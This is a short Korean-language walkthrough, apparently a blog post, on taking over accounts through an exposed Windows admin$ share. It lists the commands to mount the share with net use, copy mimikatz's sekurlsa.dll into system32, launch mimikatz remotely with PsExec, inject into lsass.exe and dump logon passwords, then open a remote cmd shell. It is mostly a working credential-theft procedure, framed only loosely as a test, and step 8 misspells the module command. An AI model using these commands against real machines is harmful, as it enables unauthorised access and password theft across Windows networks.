admin$ 공유를 이용한 계정 탈취

admin$ 공유를 이용한 계정 탈취

특히 누구나 접근 가능한 everyone 으로 열린 admin$ 공유는 매우 위험한 요소.

-> mimikatz를 이용한 admin$ 이 공유된 서버의 계정 탈취 테스트

1. 연결정보확인

>net user * /y delete

          \\xxx.xxx.xxx.xxx\admin$

     

계속하면 연결이 취소됩니다.

명령을 잘 실행했습니다.

>net use

새 연결 정보가 저장됩니다.

목록에 항목이 없습니다.

2. admin$ 공유를 net use 으로 마운트

>net use \\xxx.xxx.xxx.xxx\admin$ "pwd" /u:"user"

명령을 잘 실행했습니다.

3. 연결 정보 확인

>net use

새 연결 정보가 저장됩니다.

상태               로컬               원격                                             네트워크

OK                                        \\xxx.xxx.xxx.\admin$          Microsoft     Windows Network

4. mimikatz 를 연결시키기 위해 dll 파일을 copy

C:\>copy C:\mimikatz\x64\sekurlsa.dll \\xxx.xxx.xxx.xxx\admin$\system32

5. psexec.exe 를 사용하여 해당장비에 mimikatz으로 remote 연결

>PsExec.exe /accepteula \\xxx.xxx.xxx.xxx -c C:\mimikatz\x64\mimikatz.exe

mimikatz #

위와 같이 mimikatz 쉘이 떨어지면 공격 성공

6. debug 모드로 변경

mimikatz # privilege::debug

Demande d'ACTIVATION du privilege : SeDebugPrivilege : OK

7. sekurlsa.dll 을 lsass.exe 프로세스에 injection 한다.

mimikatz # inject::process lsass.exe sekurlsa.dll

성공적으로 injection 된 것 확인

8. sekurlsa 모듈을 이용해서 logonPasswords 탈취

mimikatz # sekurlas::logonPassword full

9. mimikatz 쉘이 아닌 cmd.exe 로 접속하고 싶다면 다음과 같이 작업

>PsExec.exe /accepteula \\xxx.xxx.xxx.xxx cmd.exe

>ipconfig